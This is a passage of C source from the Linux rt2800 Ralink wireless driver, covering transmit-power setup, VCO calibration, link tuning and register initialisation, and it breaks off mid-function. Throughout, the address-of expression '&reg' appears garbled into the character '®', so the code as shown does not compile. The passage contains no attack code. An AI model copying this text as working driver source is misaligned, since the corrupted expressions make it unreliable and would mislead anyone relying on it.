txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
power_level, txpower, delta);
rt2x00_set_field32(®, TX_PWR_CFG_RATE4, txpower);
/*
* TX_PWR_CFG_0: 9MBS, TX_PWR_CFG_1: MCS1,
* TX_PWR_CFG_2: MCS9, TX_PWR_CFG_3: unknown,
* TX_PWR_CFG_4: unknown
*/
txpower = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
power_level, txpower, delta);
rt2x00_set_field32(®, TX_PWR_CFG_RATE5, txpower);
/*
* TX_PWR_CFG_0: 12MBS, TX_PWR_CFG_1: MCS2,
* TX_PWR_CFG_2: MCS10, TX_PWR_CFG_3: unknown,
* TX_PWR_CFG_4: unknown
*/
txpower = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
power_level, txpower, delta);
rt2x00_set_field32(®, TX_PWR_CFG_RATE6, txpower);
/*
* TX_PWR_CFG_0: 18MBS, TX_PWR_CFG_1: MCS3,
* TX_PWR_CFG_2: MCS11, TX_PWR_CFG_3: unknown,
* TX_PWR_CFG_4: unknown
*/
txpower = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
power_level, txpower, delta);
rt2x00_set_field32(®, TX_PWR_CFG_RATE7, txpower);
rt2800_register_write(rt2x00dev, offset, reg);
/* next TX_PWR_CFG register */
offset += 4;
}
}
static void rt2800_config_txpower(struct rt2x00_dev *rt2x00dev,
struct ieee80211_channel *chan,
int power_level)
{
if (rt2x00_rt(rt2x00dev, RT3593))
rt2800_config_txpower_rt3593(rt2x00dev, chan, power_level);
else
rt2800_config_txpower_rt28xx(rt2x00dev, chan, power_level);
}
void rt2800_gain_calibration(struct rt2x00_dev *rt2x00dev)
{
rt2800_config_txpower(rt2x00dev, rt2x00dev->hw->conf.chandef.chan,
rt2x00dev->tx_power);
}
EXPORT_SYMBOL_GPL(rt2800_gain_calibration);
void rt2800_vco_calibration(struct rt2x00_dev *rt2x00dev)
{
u32 tx_pin;
u8 rfcsr;
/*
* A voltage-controlled oscillator(VCO) is an electronic oscillator
* designed to be controlled in oscillation frequency by a voltage
* input. Maybe the temperature will affect the frequency of
* oscillation to be shifted. The VCO calibration will be called
* periodically to adjust the frequency to be precision.
*/
rt2800_register_read(rt2x00dev, TX_PIN_CFG, &tx_pin);
tx_pin &= TX_PIN_CFG_PA_PE_DISABLE;
rt2800_register_write(rt2x00dev, TX_PIN_CFG, tx_pin);
switch (rt2x00dev->chip.rf) {
case RF2020:
case RF3020:
case RF3021:
case RF3022:
case RF3320:
case RF3052:
rt2800_rfcsr_read(rt2x00dev, 7, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR7_RF_TUNING, 1);
rt2800_rfcsr_write(rt2x00dev, 7, rfcsr);
break;
case RF3053:
case RF3070:
case RF3290:
case RF5360:
case RF5362:
case RF5370:
case RF5372:
case RF5390:
case RF5392:
rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);
break;
default:
return;
}
mdelay(1);
rt2800_register_read(rt2x00dev, TX_PIN_CFG, &tx_pin);
if (rt2x00dev->rf_channel <= 14) {
switch (rt2x00dev->default_ant.tx_chain_num) {
case 3:
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G2_EN, 1);
/* fall through */
case 2:
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G1_EN, 1);
/* fall through */
case 1:
default:
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G0_EN, 1);
break;
}
} else {
switch (rt2x00dev->default_ant.tx_chain_num) {
case 3:
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A2_EN, 1);
/* fall through */
case 2:
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A1_EN, 1);
/* fall through */
case 1:
default:
rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A0_EN, 1);
break;
}
}
rt2800_register_write(rt2x00dev, TX_PIN_CFG, tx_pin);
}
EXPORT_SYMBOL_GPL(rt2800_vco_calibration);
static void rt2800_config_retry_limit(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_conf *libconf)
{
u32 reg;
rt2800_register_read(rt2x00dev, TX_RTY_CFG, ®);
rt2x00_set_field32(®, TX_RTY_CFG_SHORT_RTY_LIMIT,
libconf->conf->short_frame_max_tx_count);
rt2x00_set_field32(®, TX_RTY_CFG_LONG_RTY_LIMIT,
libconf->conf->long_frame_max_tx_count);
rt2800_register_write(rt2x00dev, TX_RTY_CFG, reg);
}
static void rt2800_config_ps(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_conf *libconf)
{
enum dev_state state =
(libconf->conf->flags & IEEE80211_CONF_PS) ?
STATE_SLEEP : STATE_AWAKE;
u32 reg;
if (state == STATE_SLEEP) {
rt2800_register_write(rt2x00dev, AUTOWAKEUP_CFG, 0);
rt2800_register_read(rt2x00dev, AUTOWAKEUP_CFG, ®);
rt2x00_set_field32(®, AUTOWAKEUP_CFG_AUTO_LEAD_TIME, 5);
rt2x00_set_field32(®, AUTOWAKEUP_CFG_TBCN_BEFORE_WAKE,
libconf->conf->listen_interval - 1);
rt2x00_set_field32(®, AUTOWAKEUP_CFG_AUTOWAKE, 1);
rt2800_register_write(rt2x00dev, AUTOWAKEUP_CFG, reg);
rt2x00dev->ops->lib->set_device_state(rt2x00dev, state);
} else {
rt2800_register_read(rt2x00dev, AUTOWAKEUP_CFG, ®);
rt2x00_set_field32(®, AUTOWAKEUP_CFG_AUTO_LEAD_TIME, 0);
rt2x00_set_field32(®, AUTOWAKEUP_CFG_TBCN_BEFORE_WAKE, 0);
rt2x00_set_field32(®, AUTOWAKEUP_CFG_AUTOWAKE, 0);
rt2800_register_write(rt2x00dev, AUTOWAKEUP_CFG, reg);
rt2x00dev->ops->lib->set_device_state(rt2x00dev, state);
}
}
void rt2800_config(struct rt2x00_dev *rt2x00dev,
struct rt2x00lib_conf *libconf,
const unsigned int flags)
{
/* Always recalculate LNA gain before changing configuration */
rt2800_config_lna_gain(rt2x00dev, libconf);
if (flags & IEEE80211_CONF_CHANGE_CHANNEL) {
rt2800_config_channel(rt2x00dev, libconf->conf,
&libconf->rf, &libconf->channel);
rt2800_config_txpower(rt2x00dev, libconf->conf->chandef.chan,
libconf->conf->power_level);
}
if (flags & IEEE80211_CONF_CHANGE_POWER)
rt2800_config_txpower(rt2x00dev, libconf->conf->chandef.chan,
libconf->conf->power_level);
if (flags & IEEE80211_CONF_CHANGE_RETRY_LIMITS)
rt2800_config_retry_limit(rt2x00dev, libconf);
if (flags & IEEE80211_CONF_CHANGE_PS)
rt2800_config_ps(rt2x00dev, libconf);
}
EXPORT_SYMBOL_GPL(rt2800_config);
/*
* Link tuning
*/
void rt2800_link_stats(struct rt2x00_dev *rt2x00dev, struct link_qual *qual)
{
u32 reg;
/*
* Update FCS error count from register.
*/
rt2800_register_read(rt2x00dev, RX_STA_CNT0, ®);
qual->rx_failed = rt2x00_get_field32(reg, RX_STA_CNT0_CRC_ERR);
}
EXPORT_SYMBOL_GPL(rt2800_link_stats);
static u8 rt2800_get_default_vgc(struct rt2x00_dev *rt2x00dev)
{
u8 vgc;
if (rt2x00dev->curr_band == IEEE80211_BAND_2GHZ) {
if (rt2x00_rt(rt2x00dev, RT3070) ||
rt2x00_rt(rt2x00dev, RT3071) ||
rt2x00_rt(rt2x00dev, RT3090) ||
rt2x00_rt(rt2x00dev, RT3290) ||
rt2x00_rt(rt2x00dev, RT3390) ||
rt2x00_rt(rt2x00dev, RT3572) ||
rt2x00_rt(rt2x00dev, RT3593) ||
rt2x00_rt(rt2x00dev, RT5390) ||
rt2x00_rt(rt2x00dev, RT5392) ||
rt2x00_rt(rt2x00dev, RT5592))
vgc = 0x1c + (2 * rt2x00dev->lna_gain);
else
vgc = 0x2e + rt2x00dev->lna_gain;
} else { /* 5GHZ band */
if (rt2x00_rt(rt2x00dev, RT3593))
vgc = 0x20 + (rt2x00dev->lna_gain * 5) / 3;
else if (rt2x00_rt(rt2x00dev, RT5592))
vgc = 0x24 + (2 * rt2x00dev->lna_gain);
else {
if (!test_bit(CONFIG_CHANNEL_HT40, &rt2x00dev->flags))
vgc = 0x32 + (rt2x00dev->lna_gain * 5) / 3;
else
vgc = 0x3a + (rt2x00dev->lna_gain * 5) / 3;
}
}
return vgc;
}
static inline void rt2800_set_vgc(struct rt2x00_dev *rt2x00dev,
struct link_qual *qual, u8 vgc_level)
{
if (qual->vgc_level != vgc_level) {
if (rt2x00_rt(rt2x00dev, RT3572) ||
rt2x00_rt(rt2x00dev, RT3593)) {
rt2800_bbp_write_with_rx_chain(rt2x00dev, 66,
vgc_level);
} else if (rt2x00_rt(rt2x00dev, RT5592)) {
rt2800_bbp_write(rt2x00dev, 83, qual->rssi > -65 ? 0x4a : 0x7a);
rt2800_bbp_write_with_rx_chain(rt2x00dev, 66, vgc_level);
} else {
rt2800_bbp_write(rt2x00dev, 66, vgc_level);
}
qual->vgc_level = vgc_level;
qual->vgc_level_reg = vgc_level;
}
}
void rt2800_reset_tuner(struct rt2x00_dev *rt2x00dev, struct link_qual *qual)
{
rt2800_set_vgc(rt2x00dev, qual, rt2800_get_default_vgc(rt2x00dev));
}
EXPORT_SYMBOL_GPL(rt2800_reset_tuner);
void rt2800_link_tuner(struct rt2x00_dev *rt2x00dev, struct link_qual *qual,
const u32 count)
{
u8 vgc;
if (rt2x00_rt_rev(rt2x00dev, RT2860, REV_RT2860C))
return;
/* When RSSI is better than a certain threshold, increase VGC
* with a chip specific value in order to improve the balance
* between sensibility and noise isolation.
*/
vgc = rt2800_get_default_vgc(rt2x00dev);
switch (rt2x00dev->chip.rt) {
case RT3572:
case RT3593:
if (qual->rssi > -65) {
if (rt2x00dev->curr_band == IEEE80211_BAND_2GHZ)
vgc += 0x20;
else
vgc += 0x10;
}
break;
case RT5592:
if (qual->rssi > -65)
vgc += 0x20;
break;
default:
if (qual->rssi > -80)
vgc += 0x10;
break;
}
rt2800_set_vgc(rt2x00dev, qual, vgc);
}
EXPORT_SYMBOL_GPL(rt2800_link_tuner);
/*
* Initialization functions.
*/
static int rt2800_init_registers(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
u16 eeprom;
unsigned int i;
int ret;
rt2800_disable_wpdma(rt2x00dev);
ret = rt2800_drv_init_registers(rt2x00dev);
if (ret)
return ret;
rt2800_register_write(rt2x00dev, LEGACY_BASIC_RATE, 0x0000013f);
rt2800_register_write(rt2x00dev, HT_BASIC_RATE, 0x00008003);
rt2800_register_write(rt2x00dev, MAC_SYS_CTRL, 0x00000000);
rt2800_register_read(rt2x00dev, BCN_TIME_CFG, ®);
rt2x00_set_field32(®, BCN_TIME_CFG_BEACON_INTERVAL, 1600);
rt2x00_set_field32(®, BCN_TIME_CFG_TSF_TICKING, 0);
rt2x00_set_field32(®, BCN_TIME_CFG_TSF_SYNC, 0);
rt2x00_set_field32(®, BCN_TIME_CFG_TBTT_ENABLE, 0);
rt2x00_set_field32(®, BCN_TIME_CFG_BEACON_GEN, 0);
rt2x00_set_field32(®, BCN_TIME_CFG_TX_TIME_COMPENSATE, 0);
rt2800_register_write(rt2x00dev, BCN_TIME_CFG, reg);
rt2800_config_filter(rt2x00dev, FIF_ALLMULTI);
rt2800_register_read(rt2x00dev, BKOFF_SLOT_CFG, ®);
rt2x00_set_field32(®, BKOFF_SLOT_CFG_SLOT_TIME, 9);
rt2x00_set_field32(®, BKOFF_SLOT_CFG_CC_DELAY_TIME, 2);
rt2800_register_write(rt2x00dev, BKOFF_SLOT_CFG, reg);
if (rt2x00_rt(rt2x00dev, RT3290)) {
rt2800_register_read(rt2x00dev, WLAN_FUN_CTRL, ®);
if (rt2x00_get_field32(reg, WLAN_EN) == 1) {
rt2x00_set_field32(®, PCIE_APP0_CLK_REQ, 1);
rt2800_register_write(rt2x00dev, WLAN_FUN_CTRL, reg);
}
rt2800_register_read(rt2x00dev, CMB_CTRL, ®);
if (!(rt2x00_get_field32(reg, LDO0_EN) == 1)) {
rt2x00_set_field32(®, LDO0_EN, 1);
rt2x00_set_field32(®, LDO_BGSEL, 3);
rt2800_register_write(rt2x00dev, CMB_CTRL, reg);
}
rt2800_register_read(rt2x00dev, OSC_CTRL, ®);
rt2x00_set_field32(®, OSC_ROSC_EN, 1);
rt2x00_set_field32(®, OSC_CAL_REQ, 1);
rt2x00_set_field32(®, OSC_REF_CYCLE, 0x27);
rt2800_register_write(rt2x00dev, OSC_CTRL, reg);
rt2800_register_read(rt2x00dev, COEX_CFG0, ®);
rt2x00_set_field32(®, COEX_CFG_ANT, 0x5e);
rt2800_register_write(rt2x00dev, COEX_CFG0, reg);
rt2800_register_read(rt2x00dev, COEX_CFG2, ®);
rt2x00_set_field32(®, BT_COEX_CFG1, 0x00);
rt2x00_set_field32(®, BT_COEX_CFG0, 0x17);
rt2x00_set_field32(®, WL_COEX_CFG1, 0x93);
rt2x00_set_field32(®, WL_COEX_CFG0, 0x7f);
rt2800_register_write(rt2x00dev, COEX_CFG2, reg);
rt2800_register_read(rt2x00dev, PLL_CTRL, ®);
rt2x00_set_field32(®, PLL_CONTROL, 1);
rt2800_register_write(rt2x00dev, PLL_CTRL, reg);
}
if (rt2x00_rt(rt2x00dev, RT3071) ||
rt2x00_rt(rt2x00dev, RT3090) ||
rt2x00_rt(rt2x00dev, RT3290) ||
rt2x00_rt(rt2x00dev, RT3390)) {
if (rt2x00_rt(rt2x00dev, RT3290))
rt2800_register_write(rt2x00dev, TX_SW_CFG0,
0x00000404);
else
rt2800_register_write(rt2x00dev, TX_SW_CFG0,
0x00000400);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00000000);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3071, REV_RT3071E) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3090, REV_RT3090E) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3390, REV_RT3390E)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1,
&eeprom);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_DAC_TEST))
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x0000002c);
else
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x0000000f);
} else {
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000000);
}
} else if (rt2x00_rt(rt2x00dev, RT3070)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000400);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070F)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00000000);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x0000002c);
} else {
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000000);
}
} else if (rt2800_is_305x_soc(rt2x00dev)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000400);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00000000);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000030);
} else if (rt2x00_rt(rt2x00dev, RT3352)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000402);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000000);
} else if (rt2x00_rt(rt2x00dev, RT3572)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000400);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
} else if (rt2x00_rt(rt2x00dev, RT3593)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000402);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00000000);
if (rt2x00_rt_rev_lt(rt2x00dev, RT3593, REV_RT3593E)) {
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1,
&eeprom);
if (rt2x00_get_field16(eeprom,
EEPROM_NIC_CONF1_DAC_TEST))
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x0000001f);
else
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x0000000f);
} else {
rt2800_register_write(rt2x00dev, TX_SW_CFG2,
0x00000000);
}
} else if (rt2x00_rt(rt2x00dev, RT5390) ||
rt2x00_rt(rt2x00dev, RT5392) ||
rt2x00_rt(rt2x00dev, RT5592)) {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000404);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
rt2800_register_write(rt2x00dev, TX_SW_CFG2, 0x00000000);
} else {
rt2800_register_write(rt2x00dev, TX_SW_CFG0, 0x00000000);
rt2800_register_write(rt2x00dev, TX_SW_CFG1, 0x00080606);
}
rt2800_register_read(rt2x00dev, TX_LINK_CFG, ®);
rt2x00_set_field32(®, TX_LINK_CFG_REMOTE_MFB_LIFETIME, 32);
rt2x00_set_field32(®, TX_LINK_CFG_MFB_ENABLE, 0);
rt2x00_set_field32(®, TX_LINK_CFG_REMOTE_UMFS_ENABLE, 0);
rt2x00_set_field32(®, TX_LINK_CFG_TX_MRQ_EN, 0);
rt2x00_set_field32(®, TX_LINK_CFG_TX_RDG_EN, 0);
rt2x00_set_field32(®, TX_LINK_CFG_TX_CF_ACK_EN, 1);
rt2x00_set_field32(®, TX_LINK_CFG_REMOTE_MFB, 0);
rt2x00_set_field32(®, TX_LINK_CFG_REMOTE_MFS, 0);
rt2800_register_write(rt2x00dev, TX_LINK_CFG, reg);
rt2800_register_read(rt2x00dev, TX_TIMEOUT_CFG, ®);
rt2x00_set_field32(®, TX_TIMEOUT_CFG_MPDU_LIFETIME, 9);
rt2x00_set_field32(®, TX_TIMEOUT_CFG_RX_ACK_TIMEOUT, 32);
rt2x00_set_field32(®, TX_TIMEOUT_CFG_TX_OP_TIMEOUT, 10);
rt2800_register_write(rt2x00dev, TX_TIMEOUT_CFG, reg);
rt2800_register_read(rt2x00dev, MAX_LEN_CFG, ®);
rt2x00_set_field32(®, MAX_LEN_CFG_MAX_MPDU, AGGREGATION_SIZE);
if (rt2x00_rt_rev_gte(rt2x00dev, RT2872, REV_RT2872E) ||
rt2x00_rt(rt2x00dev, RT2883) ||
rt2x00_rt_rev_lt(rt2x00dev, RT3070, REV_RT3070E))
rt2x00_set_field32(®, MAX_LEN_CFG_MAX_PSDU, 2);
else
rt2x00_set_field32(®, MAX_LEN_CFG_MAX_PSDU, 1);
rt2x00_set_field32(®, MAX_LEN_CFG_MIN_PSDU, 0);
rt2x00_set_field32(®, MAX_LEN_CFG_MIN_MPDU, 0);
rt2800_register_write(rt2x00dev, MAX_LEN_CFG, reg);
rt2800_register_read(rt2x00dev, LED_CFG, ®);
rt2x00_set_field32(®, LED_CFG_ON_PERIOD, 70);
rt2x00_set_field32(®, LED_CFG_OFF_PERIOD, 30);
rt2x00_set_field32(®, LED_CFG_SLOW_BLINK_PERIOD, 3);
rt2x00_set_field32(®, LED_CFG_R_LED_MODE, 3);
rt2x00_set_field32(®, LED_CFG_G_LED_MODE, 3);
rt2x00_set_field32(®, LED_CFG_Y_LED_MODE, 3);
rt2x00_set_field32(®, LED_CFG_LED_POLAR, 1);
rt2800_register_write(rt2x00dev, LED_CFG, reg);
rt2800_register_write(rt2x00dev, PBF_MAX_PCNT, 0x1f3fbf9f);
rt2800_register_read(rt2x00dev, TX_RTY_CFG, ®);
rt2x00_set_field32(®, TX_RTY_CFG_SHORT_RTY_LIMIT, 15);
rt2x00_set_field32(®, TX_RTY_CFG_LONG_RTY_LIMIT, 31);
rt2x00_set_field32(®, TX_RTY_CFG_LONG_RTY_THRE, 2000);
rt2x00_set_field32(®, TX_RTY_CFG_NON_AGG_RTY_MODE, 0);
rt2x00_set_field32(®, TX_RTY_CFG_AGG_RTY_MODE, 0);
rt2x00_set_field32(®, TX_RTY_CFG_TX_AUTO_FB_ENABLE, 1);
rt2800_register_write(rt2x00dev, TX_RTY_CFG, reg);
rt2800_register_read(rt2x00dev, AUTO_RSP_CFG, ®);
rt2x00_set_field32(®, AUTO_RSP_CFG_AUTORESPONDER, 1);
rt2x00_set_field32(®, AUTO_RSP_CFG_BAC_ACK_POLICY, 1);
rt2x00_set_field32(®, AUTO_RSP_CFG_CTS_40_MMODE, 0);
rt2x00_set_field32(®, AUTO_RSP_CFG_CTS_40_MREF, 0);
rt2x00_set_field32(®, AUTO_RSP_CFG_AR_PREAMBLE, 1);
rt2x00_set_field32(®, AUTO_RSP_CFG_DUAL_CTS_EN, 0);
rt2x00_set_field32(®, AUTO_RSP_CFG_ACK_CTS_PSM_BIT, 0);
rt2800_register_write(rt2x00dev, AUTO_RSP_CFG, reg);
rt2800_register_read(rt2x00dev, CCK_PROT_CFG, ®);
rt2x00_set_field32(®, CCK_PROT_CFG_PROTECT_RATE, 3);
rt2x00_set_field32(®, CCK_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, CCK_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_MM40, 0);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, CCK_PROT_CFG_TX_OP_ALLOW_GF40, 0);
rt2x00_set_field32(®, CCK_PROT_CFG_RTS_TH_EN, 1);
rt2800_register_write(rt2x00dev, CCK_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, OFDM_PROT_CFG, ®);
rt2x00_set_field32(®, OFDM_PROT_CFG_PROTECT_RATE, 3);
rt2x00_set_field32(®, OFDM_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, OFDM_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_MM40, 0);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, OFDM_PROT_CFG_TX_OP_ALLOW_GF40, 0);
rt2x00_set_field32(®, OFDM_PROT_CFG_RTS_TH_EN, 1);
rt2800_register_write(rt2x00dev, OFDM_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, MM20_PROT_CFG, ®);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_RATE, 0x4004);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, MM20_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_MM40, 0);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, MM20_PROT_CFG_TX_OP_ALLOW_GF40, 0);
rt2x00_set_field32(®, MM20_PROT_CFG_RTS_TH_EN, 0);
rt2800_register_write(rt2x00dev, MM20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, MM40_PROT_CFG, ®);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_RATE, 0x4084);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, MM40_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_MM40, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_TX_OP_ALLOW_GF40, 1);
rt2x00_set_field32(®, MM40_PROT_CFG_RTS_TH_EN, 0);
rt2800_register_write(rt2x00dev, MM40_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF20_PROT_CFG, ®);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_RATE, 0x4004);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, GF20_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_MM40, 0);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, GF20_PROT_CFG_TX_OP_ALLOW_GF40, 0);
rt2x00_set_field32(®, GF20_PROT_CFG_RTS_TH_EN, 0);
rt2800_register_write(rt2x00dev, GF20_PROT_CFG, reg);
rt2800_register_read(rt2x00dev, GF40_PROT_CFG, ®);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_RATE, 0x4084);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_CTRL, 0);
rt2x00_set_field32(®, GF40_PROT_CFG_PROTECT_NAV_SHORT, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_CCK, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_OFDM, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_MM20, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_MM40, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_GF20, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_TX_OP_ALLOW_GF40, 1);
rt2x00_set_field32(®, GF40_PROT_CFG_RTS_TH_EN, 0);
rt2800_register_write(rt2x00dev, GF40_PROT_CFG, reg);
if (rt2x00_is_usb(rt2x00dev)) {
rt2800_register_write(rt2x00dev, PBF_CFG, 0xf40006);
rt2800_register_read(rt2x00dev, WPDMA_GLO_CFG, ®);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_TX_DMA, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_TX_DMA_BUSY, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_RX_DMA, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_RX_DMA_BUSY, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_WP_DMA_BURST_SIZE, 3);
rt2x00_set_field32(®, WPDMA_GLO_CFG_TX_WRITEBACK_DONE, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_BIG_ENDIAN, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_RX_HDR_SCATTER, 0);
rt2x00_set_field32(®, WPDMA_GLO_CFG_HDR_SEG_LEN, 0);
rt2800_register_write(rt2x00dev, WPDMA_GLO_CFG, reg);
}
/*
* The legacy driver also sets TXOP_CTRL_CFG_RESERVED_TRUN_EN to 1
* although it is reserved.
*/
rt2800_register_read(rt2x00dev, TXOP_CTRL_CFG, ®);
rt2x00_set_field32(®, TXOP_CTRL_CFG_TIMEOUT_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_AC_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_TXRATEGRP_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_USER_MODE_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_MIMO_PS_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_RESERVED_TRUN_EN, 1);
rt2x00_set_field32(®, TXOP_CTRL_CFG_LSIG_TXOP_EN, 0);
rt2x00_set_field32(®, TXOP_CTRL_CFG_EXT_CCA_EN, 0);
rt2x00_set_field32(®, TXOP_CTRL_CFG_EXT_CCA_DLY, 88);
rt2x00_set_field32(®, TXOP_CTRL_CFG_EXT_CWMIN, 0);
rt2800_register_write(rt2x00dev, TXOP_CTRL_CFG, reg);
reg = rt2x00_rt(rt2x00dev, RT5592) ? 0x00000082 : 0x00000002;
rt2800_register_write(rt2x00dev, TXOP_HLDR_ET, reg);
rt2800_register_read(rt2x00dev, TX_RTS_CFG, ®);
rt2x00_set_field32(®, TX_RTS_CFG_AUTO_RTS_RETRY_LIMIT, 32);
rt2x00_set_field32(®, TX_RTS_CFG_RTS_THRES,
IEEE80211_MAX_RTS_THRESHOLD);
